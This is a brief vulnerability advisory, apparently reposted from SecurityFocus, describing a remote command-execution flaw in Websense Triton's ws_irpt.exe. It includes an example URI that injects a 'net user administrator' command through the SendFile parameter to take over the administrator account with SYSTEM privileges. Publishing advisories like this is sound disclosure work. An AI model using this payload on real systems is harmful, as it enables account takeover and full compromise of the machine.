Websense Triton 'ws_irpt.exe' RCE Vulnerability

2012-05-02 15:15:06

Source: http://www.securityfocus.com/bid/51086/info

Websense Triton is prone to a remote command-execution vulnerability.

An attacker can exploit this issue to execute arbitrary commands with SYSTEM-level privileges. Successfully exploiting this issue will result in the complete compromise of affected computers.

The following example URI is available:

https://www.example.com/explorer_wse/ws_irpt.exe?&SendFile=echo.pdf%26net user administrator blah|

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.